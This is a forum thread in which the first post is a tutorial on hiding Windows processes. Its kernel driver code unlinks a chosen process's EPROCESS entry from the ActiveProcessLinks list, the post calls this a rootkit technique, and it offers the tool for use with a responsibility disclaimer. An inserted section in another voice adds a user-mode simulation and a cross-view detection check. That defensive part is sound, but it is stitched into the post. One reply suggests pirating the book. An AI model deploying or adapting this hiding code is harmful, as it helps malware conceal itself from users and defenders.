C // C++ General discussions about C and C++.

#1
10th February 2009, 21:44
macd3v (Cyber Assassin; joined Oct 2008, 401 posts)
Process Hiding

Tutorial written by xWeasel

Hey guys.
I've written a (sorta) simple program which lets you hide any process you want. It works by using DKOM (Direct Kernel Object Manipulation). To understand how this works, you need to understand how process listing in Windows works.

Each process has an EPROCESS struct (which isn't officially documented) in the kernel's memory. This structure contains info such as PID, exe name, and a whole whackload of stuff. The struct member that interests us is: LIST_ENTRY ActiveProcessLinks. See the MSDN page for LIST_ENTRY.
The Flink member of this struct points to the next entry (process) in the doubly-linked list. The Blink member points to the previous entry (process).
Here's a diagram explaining how this works:



So, in order to hide a process, all we need to do is disconnect it from the doubly-linked list. Sounds simple, huh? Well it is. All we need to do is set the Flink of the process preceding the process we want to hide to the Flink of the process we're hiding. The same is done with the Blink of the next process, which is set to the Blink of the process being hidden. This is all accomplished in a few lines of code. I attached the full source to this post, but I'll post the code that does the hiding here so you can take a look:

Code:
if(PsLookupProcessByProcessId((PVOID)hps->uPid, &pEProc) == STATUS_SUCCESS){ //get EPROCESS struct for the process we want to hide
    DbgPrint("EPROCESS found. Address: %08lX.\n", pEProc);
    DbgPrint("Now hiding process %d...\n", hps->uPid);
    dwEProcAddr = (ULONG) pEProc; //get address of process's EPROCESS struct
    __try{ //try/except just in case, so we don't get a BSOD
        pListProcs = (PLIST_ENTRY) (dwEProcAddr + hps->uFlinkOffset); //pListProcs points at the LIST_ENTRY (ActiveProcessLinks)
                                                                          //in the process being hidden (uFlinkOffset varies between 2k and XP)
        *((ULONG*) pListProcs->Blink) = (ULONG) (pListProcs->Flink);   //set flink of prev proc to flink of cur proc
        *((ULONG*) pListProcs->Flink+1) = (ULONG) (pListProcs->Blink); //set blink of next proc to blink of cur proc
        pListProcs->Flink = (PLIST_ENTRY) &(pListProcs->Flink); //set flink and blink of cur proc to themselves
        pListProcs->Blink = (PLIST_ENTRY) &(pListProcs->Flink); //otherwise might bsod when exiting process
        DbgPrint("Process now hidden.\n");
    }__except(EXCEPTION_EXECUTE_HANDLER){
        NtStatus = GetExceptionCode();
        DbgPrint("Exception: %d.\n", NtStatus);
    }
    NtStatus = STATUS_SUCCESS;
}
After the process is hidden, the doubly-linked list looks something like this:



So when a program is listing processes, it skips over the one that we hid. This kind of technique is commonly used by rootkits to conceal their processes. This method has its own pros and cons, such as being easier to write than a hook, and in some cases easier or harder to detect.

Here's an example of what you can do with this program:



This program works on Windows XP (any version) and Windows 2000 (tested on Professional, but should work on all).
I suggest reading Rootkits: Subverting the Windows Kernel if you want to learn more about techniques such as this (and this code is partially based on info in that book, but simplified a bit).
P.S. I'm not responsible for how you use this code and/or any damages that may be caused as a result of you using this code.

Source
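Added example, not the post's or xWeasel's code: a user-mode C simulation of the unlink described above against a constructed process list, followed by the cross-view check defenders use to catch it. The point the post touches on ("easier or harder to detect") is that unlinking ActiveProcessLinks only hides the process from list walkers; a second index that the unlink never touches (the kernel's PID/handle table, modelled here by a plain array) still knows the process, and disagreement between the two views is the detection signal. LIST_ENTRY, EPROCESS and the PID table below are stand-ins I constructed, not the kernel's.

```c
#include <stddef.h>
#include <string.h>

/* User-mode stand-ins for the kernel objects the post describes (constructed for this example). */
typedef struct list_entry { struct list_entry *Flink, *Blink; } LIST_ENTRY;
typedef struct eprocess { unsigned pid; LIST_ENTRY ActiveProcessLinks; } EPROCESS;

#define MAXPID 8
static EPROCESS procs[MAXPID];  /* view 2: a PID-indexed table, standing in for the kernel's PID/handle table */
static int alive[MAXPID];
static LIST_ENTRY head;         /* plays the role of PsActiveProcessHead */
static EPROCESS *from_links(LIST_ENTRY *e) { return (EPROCESS *)((char *)e - offsetof(EPROCESS, ActiveProcessLinks)); }

/* Reset both views and append constructed PIDs 1,3,5,7 to the list tail. Returns how many were added. */
int build_table(void) {
    int n = 0;
    memset(alive, 0, sizeof alive);
    head.Flink = head.Blink = &head;
    for (unsigned pid = 1; pid < MAXPID; pid += 2, n++) {
        LIST_ENTRY *e = &procs[pid].ActiveProcessLinks;
        procs[pid].pid = pid; alive[pid] = 1;
        e->Flink = &head; e->Blink = head.Blink;
        head.Blink->Flink = e; head.Blink = e;
    }
    return n;
}

/* The unlink the post performs, applied to the simulated list; the PID table is untouched. */
int unlink_process(unsigned pid) {
    if (pid >= MAXPID || !alive[pid]) return 0;
    LIST_ENTRY *e = &procs[pid].ActiveProcessLinks;
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
    e->Flink = e->Blink = e;    /* point the entry at itself, as the post does */
    return 1;
}

/* View 1: walk ActiveProcessLinks the way a process lister does. Returns a bitmask of PIDs reached. */
unsigned walk_list(void) {
    unsigned seen = 0;
    for (LIST_ENTRY *e = head.Flink; e != &head; e = e->Flink)
        seen |= 1u << from_links(e)->pid;
    return seen;
}

/* Cross-view check: PIDs the table knows but the list walk never reaches are hidden. */
unsigned find_hidden(void) {
    unsigned table = 0, seen = walk_list();
    for (unsigned pid = 0; pid < MAXPID; pid++) if (alive[pid]) table |= 1u << pid;
    return table & ~seen;
}
```

On a real system the same comparison is done between a list-based enumeration and an independent source such as probing PIDs directly or scanning memory for process objects; any PID that exists in one view but not the other is worth investigating.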
#2
4th January 2010, 01:02
K1llTh3C0rruption (joined Nov 2009, US, 66 posts)
Re: Process Hiding

nice. I ordered a copy of Rootkits: Subverting the Windows Kernel and expect to get a lot out of it.

Note to anyone who wants the Rootkits book: I looked in about 5 different stores today and nobody had it. Your best bet is to get it online. I ordered mine on Amazon.
#3
7th January 2010, 17:03
MaXe (Studying shellcode..; joined Jun 2008, Sweden - Ljusdal, 3,405 posts)
Re: Process Hiding

The book is easy to find on the web, just search for it on rapidshare :-D
#4
7th January 2010, 17:53
K1llTh3C0rruption (joined Nov 2009, US, 66 posts)
Re: Process Hiding

I like a hard copy. I can't stand reading on a screen.
But I got my copy and love it!
#5
21st January 2010, 19:44
lordsteam (joined Jan 2010, 3 posts)
Re: Process Hiding

LOL, Virused AV detects it as Spy.Keylogger.TrojanNDQ lol ahha
#6
2nd February 2010, 15:11
MaXe (Studying shellcode..; joined Jun 2008, Sweden - Ljusdal, 3,405 posts)

Quote:
Originally Posted by K1llTh3C0rruption View Post
I like a hard copy. I can't stand reading on a screen.
But I got my copy and love it!
I prefer hard copies too, easier to read (it has been researched that it is easier to read longer texts / documents in hard copy form due to the nature of text that is displayed virtually as well).